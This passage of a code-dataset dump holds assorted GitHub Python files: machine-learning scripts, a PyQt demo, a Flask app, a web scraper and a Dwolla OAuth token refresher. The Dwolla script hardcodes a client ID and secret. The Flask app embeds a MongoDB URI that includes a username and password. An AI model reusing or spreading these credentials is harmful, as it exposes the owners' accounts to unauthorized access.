"usage_type": "name"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 404, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 404, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 405, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 405, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 408, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 408, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 409, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 409, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 430, "usage_type": "call"}, {"api_name": "time.time", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 443, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 459, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 460, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 461, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 462, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 463, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 464, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 472, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.build_roatation_matrix_3D", "line_number": 473, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.coords_ro_move", "line_number": 474, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 476, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 477, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 483, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 484, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 485, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 509, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.build_roatation_matrix_3D", "line_number": 510, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 513, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 514, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 515, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 516, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.coords_ro_move", "line_number": 517, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 530, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 531, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 532, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 533, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 533, "usage_type": "attribute"}, {"api_name": "numpy.arccos", "line_number": 534, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 534, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 538, "usage_type": "call"}, {"api_name": "cv2.normalize", "line_number": 541, "usage_type": "call"}, {"api_name": "cv2.NORM_MINMAX", "line_number": 541, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 543, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 544, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2RGB", "line_number": 544, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 546, "usage_type": "call"}, {"api_name": "cv2.normalize", "line_number": 549, "usage_type": "call"}, {"api_name": "cv2.NORM_MINMAX", "line_number": 549, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 551, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 552, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2RGB", "line_number": 552, "usage_type": "attribute"}]}
+{"seq_id": "12842844172", "text": "'''\nAuthor: Peter Chen\nAdapted from: https://docsv2.dwolla.com/#oauth\nPurpose: Creates a new refresh token and access token. \nPlease check the Readme for more details.\n'''\nimport requests\nimport json\nimport sys\n\ndef genToken():\n\tfrefresh = open('mysite/refresh_token.txt', 'r')\n\tinputtoken = frefresh.read()\n\turl = 'https://uat.dwolla.com/oauth/v2/token'\n\n\tpayload = {\n\t \"client_id\": \"KORB1uPLiCs2vO96B4Hiwxf8PsQ3Vk43I4k4oopegs5HjrmkLd\",\n\t \"client_secret\": \"6919gTg6EcX1EK2YulRvDgWeDuMTvIFUt3krwux52e4REeP7Mq\",\n\t \"refresh_token\": inputtoken,\n\t \"grant_type\": \"refresh_token\"\n\t}\n\n\tnew_tok = requests.post(url, data=payload)\n\tparsed_json = json.loads(new_tok.text)\n\tnewRefresh = parsed_json['refresh_token']\n\tnewAccess = parsed_json['access_token']\n\n\tfrefresh = open('mysite/refresh_token.txt', 'w+')\n\tfaccess = open('mysite/access_token.txt', 'w+')\n\tfaccess.write(newAccess)\n\tfrefresh.write(newRefresh)\n\treturn newAccess\n\n\n", "repo_name": "nestegg333/backend", "sub_path": "mysite/mysite/genauthtoken.py", "file_name": "genauthtoken.py", "file_ext": "py", "file_size_in_byte": 925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.post", "line_number": 23, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "17517859737", "text": "#Author: Eduardo Santos Carlos de Souza\n\n#Usage:\n#argv[1] = basis vgg16 network\n#argv[2] = new fc2 size\n#argv[3] = .npy file of train dataset for predictions size\n#argv[4] = filename to store the generated Model\n\nfrom keras.layers import Dense\nfrom keras.models import Model, load_model\nimport numpy as np\nimport sys\n\n\n#Variaveis de entrada e saida da rede\nvgg16_imgnet = load_model(sys.argv[1])\nfc2_size = int(sys.argv[2])\narr = np.load(sys.argv[3])\nn_classes = arr['arr_1'].shape[1]\narr.close()\nfilename = sys.argv[4]\n\nprint(\"Network: \" + sys.argv[1])\nprint(\"FC2 Size: \" + str(fc2_size))\nprint(\"# of classes: \" + str(n_classes))\nprint(\"Output Network: \" + filename)\n\nfor layer in vgg16_imgnet.layers:\n\tlayer.trainable = False\n\nnew_tensor = Dense(fc2_size, activation='relu', name='fc2')(vgg16_imgnet.get_layer(name='fc1').output)\nnew_tensor = Dense(n_classes, activation='softmax', name='predictions')(new_tensor)\n\n#Gerar modelo\nnew_vgg16 = Model(vgg16_imgnet.input, new_tensor)\nnew_vgg16.compile(loss='mean_squared_error', optimizer='sgd', metrics=['accuracy'])\nnew_vgg16.summary()\n\n#Salvar modelo\nnew_vgg16.save(filename)", "repo_name": "eduardoscsouza/Pre-Trained-CNN", "sub_path": "generatecnn.py", "file_name": "generatecnn.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "keras.models.load_model", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "keras.layers.Dense", "line_number": 31, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "72326180007", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport sip\n\nfrom PyQt5.QtWidgets import QWidget, QComboBox, QVBoxLayout, QLabel, QApplication\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\n# sip.setapi('QString', 2)\n# sip.setapi('QVariant', 2)\n\n\nclass ImageChanger(QWidget):\n def __init__(self, images, parent=None):\n super(ImageChanger, self).__init__(parent)\n\n self.comboBox = QComboBox(self)\n self.comboBox.addItems(images)\n\n self.layout = QVBoxLayout(self)\n self.layout.addWidget(self.comboBox)\n\nclass MyWindow(QWidget):\n def __init__(self, images, parent=None):\n super(MyWindow, self).__init__(parent)\n self.label = QLabel(self)\n self.imageChanger = ImageChanger(images)\n self.imageChanger.move(self.imageChanger.pos().y(), self.imageChanger.pos().x() + 100)\n self.imageChanger.show()\n self.imageChanger.comboBox.currentIndexChanged[str].connect(self.changeImage)\n self.layout = QVBoxLayout(self)\n\n @pyqtSlot(str)\n def changeImage(self, pathToImage):\n pixmap = QPixmap(pathToImage)\n\n\nif __name__ == \"__main__\":\n import sys\n\n images = [ \"left.png\",\n \"right.png\",\n \"Temmie.png\",\n ]\n\n app = QApplication(sys.argv)\n app.setApplicationName('MyWindow')\n\n main = MyWindow(images)\n main.show()\n\n sys.exit(app.exec_())", "repo_name": "JangTry/raiseMe", "sub_path": "imagechangeEx.py", "file_name": "imagechangeEx.py", "file_ext": "py", "file_size_in_byte": 1388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 14, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QComboBox", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 24, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 27, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 47, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "20399293519", "text": "# coding=UTF-8\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport pickle\n\n\npages = set()\ndef getLinks(pageUrl):\n global pages\n html = urlopen(\"http://www.tianqihoubao.com\"+pageUrl)\n bsObj = BeautifulSoup(html, \"lxml\")\n\n for link in bsObj.findAll(\"a\", href=re.compile(\"^(/aqi/)[a-zA-Z]+(-)?[0-9]*(\\.html)\")):\n if 'href' in link.attrs:\n if link.attrs['href'] not in pages:\n #We have encountered a new page\n newPage = link.attrs['href']\n print(newPage)\n pages.add(newPage)\n getLinks(newPage)\n\n\ngetLinks(\"/aqi/\")\nF = open('E:/docs/pages.pkl', 'wb')\npickle.dump(pages, F)\n\n\n\n", "repo_name": "plutoese/db-analysis", "sub_path": "application/webscraper/demo_first_ws.py", "file_name": "demo_first_ws.py", "file_ext": "py", "file_size_in_byte": 707, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.request.urlopen", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 15, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "25606272722", "text": "# -*- coding: utf-8 -*-\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import minmax_scale\n#from sklearn.metrics import confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier\nimport pickle\n#from sklearn.externals import joblib\nimport joblib\n\nimport warnings\n\ndef clf_fnc(arr):\n\n warnings.filterwarnings('ignore')\n\n try:\n clf = joblib.load('filename.pkl')\n except:\n dataset = pd.read_csv('Training Dataset.csv')\n # dataset 분리\n X = dataset.iloc[:, 0:29]\n Y = dataset.iloc[:, 29:]\n train_scaled = minmax_scale(X, axis = 0)\n ncol = train_scaled.shape[1] # 29\n\n (X_train, X_test, y_train_labels, y_test_labels) = train_test_split(train_scaled, \n Y, test_size=0.3, random_state=np.random.seed(172))\n\n clf = RandomForestClassifier(max_depth=30, criterion='gini')\n clf.fit(X_train, y_train_labels)\n saved_model = pickle.dumps(clf)\n joblib.dump(clf, 'filename.pkl') \n #------ modle save code\n\n a=np.array(arr).reshape(1,29)\n\n result = clf.predict(a)\n print(result)\n #----- predict result from load model\n return result\n", "repo_name": "melpin/capstone_design_project_1", "sub_path": "clf.py", "file_name": "clf.py", "file_ext": "py", "file_size_in_byte": 1274, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 16, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.minmax_scale", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 31, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 33, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "22027553207", "text": "import pygame as pg\nimport nn\nimport numpy as np\nimport constants as cn\nfrom random import randint\n\nclass Bird:\n def __init__(self, weights=None, ai=None):\n self.x = 60\n self.y = randint(10,cn.HEIGHT-10)\n self.speed = 4\n self.ai = ai\n self.rect = pg.Rect(self.x,self.y,cn.B_WIDTH, cn.B_HEIGHT)\n self.dead = False\n if not weights:\n self.net = nn.Network()\n else: self.net = nn.Network(weights)\n self.fitness = 0\n\n def update(self, pipe):\n self.image = pg.image.load('assets/0.png')\n out = self.net.feedforward([(self.rect.x - pipe.pipe_up.x), (self.rect.y - pipe.pipe_down.y)])\n if out > 0.5:\n self.jump()\n self.move()\n\n def move(self):\n # checking if jumped recently if so decrease velocity until its default again\n if self.speed < 4:\n self.speed += 1\n self.image = pg.image.load('assets/1.png')\n else: self.image = pg.image.load('assets/0.png')\n self.rect.move_ip(0,self.speed)\n\n def jump(self):\n self.speed = -12\n self.fitness -= 3\n\n def draw(self, screen):\n screen.blit(self.image.convert_alpha(),self.rect)\n\n\n\n", "repo_name": "huddy14/flappybird-ai-nn", "sub_path": "bird.py", "file_name": "bird.py", "file_ext": "py", "file_size_in_byte": 1213, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.randint", "line_number": 10, "usage_type": "call"}, {"api_name": "constants.HEIGHT", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 13, "usage_type": "call"}, {"api_name": "constants.B_WIDTH", "line_number": 13, "usage_type": "attribute"}, {"api_name": "constants.B_HEIGHT", "line_number": 13, "usage_type": "attribute"}, {"api_name": "nn.Network", "line_number": 16, "usage_type": "call"}, {"api_name": "nn.Network", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 32, "usage_type": "attribute"}]}
+{"seq_id": "3917639273", "text": "import pprint\nimport xlsxwriter\n\n\ntotalParticles = {}\nparticlesValues = []\nmegaPartsValues = []\n\nmaxRow = 0\n##############\n# Parse Data\n##############\nwith open('particlePerformance.txt') as fp:\n\tfor line in fp:\n\t\tparsed = [float(x.strip()) for x in line.split('\\t')]\n\t\tnumParticles = parsed[0]\n\t\tmegaPartsPerSec = parsed[1]\n\n\t\tif numParticles not in particlesValues:\n\t\t\tparticlesValues.append(numParticles)\n\t\tif megaPartsPerSec not in megaPartsValues:\n\t\t\tmegaPartsValues.append(megaPartsPerSec)\n\n\t\tif numParticles not in totalParticles:\n\t\t\ttotalParticles[numParticles] = []\n\t\ttotalParticles[numParticles].append(megaPartsPerSec)\n\npp = pprint.PrettyPrinter(indent=4)\npp.pprint(totalParticles)\n\n\nworkbook = xlsxwriter.Workbook('results.xlsx')\nworksheet = workbook.add_worksheet()\nbold_cell_format = workbook.add_format()\nbold_cell_format.set_bold()\n############# writing table to excel #############\ncol = 1\navg = 0\nprint(\"------ Averages -----\")\nfor numParts, values in totalParticles.items():\n\tworksheet.write(0, col, numParts, bold_cell_format)\n\trow = 1\n\tfor megaPartPer in values:\n\t\tavg += megaPartPer\n\t\tworksheet.write(row, col, megaPartPer)\n\t\trow += 1\n\tprint(str(numParts) + \": \\t\" + str( int(avg/ len(values)) ) )\n\tcol += 1\n\tif maxRow < row:\n\t\tmaxRow = row\n\n############# Graph building #############\n##############################################\n# LINE GRAPH MegaParticlesPerSec v. Total Num Particles\n# \tValues = Y axis\t Categories = X axis\n#\tValues = MegaParticles Categories = Num Particles\n##############################################\n\nchart1 = workbook.add_chart({'type': 'bar'})\ncol = 1\nstartRow = 1\nlastRow = maxRow\nfor i in particlesValues:\n\t# [sheetname, first_row, first_col, last_row, last_col]\n\tchart1.add_series({\n\t\t'name': \"Particles: \" + str(i),\n 'values': ['Sheet1', startRow, col, lastRow, col],\n 'categories': ['Sheet1', 0, col, 0, col]\n })\n\tcol += 1\n\n\n# Configure the chart axes.\nchart1.set_x_axis({\n\t'name': 'Total Number of Particles',\n})\nchart1.set_y_axis({\n\t'name': 'MegaParticles Per Second',\n})\n\ncurrentInsertDepth = 1\ninsert = str(chr(65 + len(particlesValues) + 1)) + str(currentInsertDepth)\n# Insert the chart into the worksheet.\nworksheet.insert_chart(insert, chart1)\n", "repo_name": "fischjer4/Parallel-Programming", "sub_path": "Project-7/generateExelData.py", "file_name": "generateExelData.py", "file_ext": "py", "file_size_in_byte": 2229, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pprint.PrettyPrinter", "line_number": 28, "usage_type": "call"}, {"api_name": "xlsxwriter.Workbook", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "14890891819", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass ResidualBlock(nn.Module):\n \"\"\"残差块结构\n \"\"\"\n def __init__(self, input_channels, output_channels, conv_x1=False, strides=1):\n super(ResidualBlock, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(input_channels, output_channels, kernel_size=3, padding=1, stride=strides),\n nn.BatchNorm2d(output_channels),\n nn.LeakyReLU(0.1)\n )\n self.conv2 = nn.Sequential(\n nn.Conv2d(output_channels, output_channels, kernel_size=3, padding=1, stride=strides),\n nn.BatchNorm2d(output_channels),\n )\n if conv_x1:\n self.conv3 = nn.Conv2d(input_channels, output_channels, kernel_size=3, padding=1)\n else:\n self.conv3 = None\n\n def forward(self, x):\n # 第一次卷积\n out = self.conv1(x)\n # 第二次卷积\n out = self.conv2(out)\n\n if self.conv3:\n x = self.conv3(x)\n\n out = F.leaky_relu_(x + out, 0.1)\n return out\n\n\nclass FanNet(nn.Module):\n \"\"\"基于残差块的卷积神经网络 run\n \"\"\"\n def __init__(self):\n super(FanNet, self).__init__()\n\n # 卷积层1 input 1x28x28 output 16x12x12\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=5),\n nn.BatchNorm2d(16, affine=True),\n nn.LeakyReLU(0.1),\n nn.MaxPool2d(kernel_size=2),\n )\n # 卷积层2 input 16x12x12 output 32x4x4\n self.conv2 = nn.Sequential(\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=5),\n # nn.BatchNorm2d(32, affine=True),\n nn.LeakyReLU(0.1),\n nn.MaxPool2d(kernel_size=2),\n )\n\n # 全连接层\n self.fc1 = nn.Linear(32 * 4 * 4, 84)\n self.fc2 = nn.Linear(84, 10)\n\n self.dropout = nn.Dropout(0.25)\n\n # 前向传播\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n\n # flatten层\n x = x.view(x.size(0), -1)\n\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout(x)\n out = self.fc2(x)\n\n return out\n", "repo_name": "lqz72/MNIST-classifier", "sub_path": "network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 2223, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.functional.leaky_relu_", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 74, "usage_type": "name"}]}
+{"seq_id": "40892905194", "text": "#################################################\n# Dependencies\n#################################################\nimport pandas as pd\nfrom flask import Flask, jsonify, render_template, redirect, url_for\nimport pymongo\nimport json\n\n#################################################\n# Helper Functions\n#################################################\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Database Setup\n#################################################\n# Set up Mongo/PyMongo\nconn = \"mongodb://heroku_2rsv5d25:iktn3mgtq8k4qluqgmlhug6kp6@ds233228.mlab.com:33228/heroku_2rsv5d25\"\nclient = pymongo.MongoClient(conn,\n connectTimeoutMS=30000,\n socketTimeoutMS=None,\n socketKeepAlive=True)\n\n# Map Database\ndb = client.heroku_2rsv5d25\n\n# Map collection (Table)\nveilofignorance = db.veilofignorance\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef home():\n print(\"Server received request for 'Home' page...\")\n return render_template(\"index.html\")\n\n# API\n@app.route(\"/api/veilofignorance\")\ndef allStates():\n data = db.veilofignorance.find()\n print(type(data))\n allStates = list(data)\n for state in data:\n allStates.append(state)\n # remove _id\n for state in allStates:\n state.pop(\"_id\")\n\n return jsonify(allStates)\n\n# About\n@app.route(\"/about\")\ndef about():\n print(\"Server received request for 'About' page...\")\n return render_template(\"about.html\")\n\n# User-friendly API\n@app.route(\"/api\")\ndef api():\n print(\"Server received request for 'API' page...\")\n return render_template(\"api.html\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n", "repo_name": "cbt8/veil_of_ignorance", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1910, "program_lang": "python", "lang": "de", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "33494183994", "text": "import cv2\nfrom ultralytics import YOLO\nimport numpy as np\n\n# Load Model\npose_model = YOLO(\"yolov8s-pose.pt\")\n\n# Keypoint names\nkeypoint_names = [\n \"nose\",\n \"left_eye\",\n \"right_eye\",\n \"left_ear\",\n \"right_ear\",\n \"left_shoulder\",\n \"right_shoulder\",\n \"left_elbow\",\n \"right_elbow\",\n \"left_wrist\",\n \"right_wrist\",\n \"left_hip\",\n \"right_hip\",\n \"left_knee\",\n \"right_knee\",\n \"left_ankle\",\n \"right_ankle\",\n]\n\n# Open the webcam\ncap = cv2.VideoCapture(1)\n\nwhile cap.isOpened():\n success, frame = cap.read()\n\n if success:\n # Pose detection\n pose_results = pose_model(frame, verbose=False, conf=0.5)\n\n # Print each body coordinate as a dictionary\n for person in pose_results:\n keypoints = person.keypoints.data[0]\n for keypoint, name in zip(keypoints, keypoint_names):\n x, y, probability = keypoint\n print(\n {\n \"keypoint\": name,\n \"x\": x.item(),\n \"y\": y.item(),\n \"probability\": probability.item(),\n }\n )\n\n pose_annotated_frame = person.plot()\n cv2.imshow(\"Pose Detection\", pose_annotated_frame)\n\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n break\n else:\n break\n\ncap.release()\ncv2.destroyAllWindows()\n", "repo_name": "JakeAum/PushupPy", "sub_path": "pose_testing.py", "file_name": "pose_testing.py", "file_ext": "py", "file_size_in_byte": 1412, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ultralytics.YOLO", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "10210923962", "text": "\"\"\"\nGeneric type & functions for torch.Tensor and np.ndarray\n\"\"\"\n\nimport torch\nfrom torch import Tensor\n\nimport numpy as np\nfrom numpy import ndarray\n\nfrom typing import Tuple, Union, List, TypeVar\n\n\nTensArr = TypeVar('TensArr', Tensor, ndarray)\n\n\ndef convert(a: TensArr, astype: type) -> TensArr:\n if astype == Tensor:\n if type(a) == Tensor:\n return a\n else:\n return torch.tensor(a, dtype=torch.float32)\n elif astype == ndarray:\n if type(a) == Tensor:\n return a.numpy()\n else:\n return a\n else:\n raise ValueError(astype)\n\n\ndef shape(a: TensArr) -> Tuple[int, ...]:\n if type(a) == Tensor:\n return tuple(a.size())\n elif type(a) == ndarray:\n return a.shape\n else:\n raise TypeError\n\n\ndef ndim(a: TensArr) -> int:\n if type(a) == Tensor:\n return a.dim()\n elif type(a) == ndarray:\n return a.ndim\n else:\n raise TypeError\n\n\ndef transpose(a: TensArr,\n axes: Union[int, Tuple[int, ...], List[int]]=None) -> TensArr:\n if type(a) == Tensor:\n if not axes:\n if a.dim() >= 2:\n return a.permute((1, 0)+(-1,)*(a.dim()-2))\n else:\n return a\n else:\n return a.permute(axes)\n\n elif type(a) == ndarray:\n if a.ndim == 1 and not axes:\n return a\n else:\n return a.transpose(axes)\n else:\n raise TypeError\n\n\ndef squeeze(a: TensArr, axis=None) -> int:\n if type(a) == Tensor:\n return a.squeeze(dim=axis)\n elif type(a) == 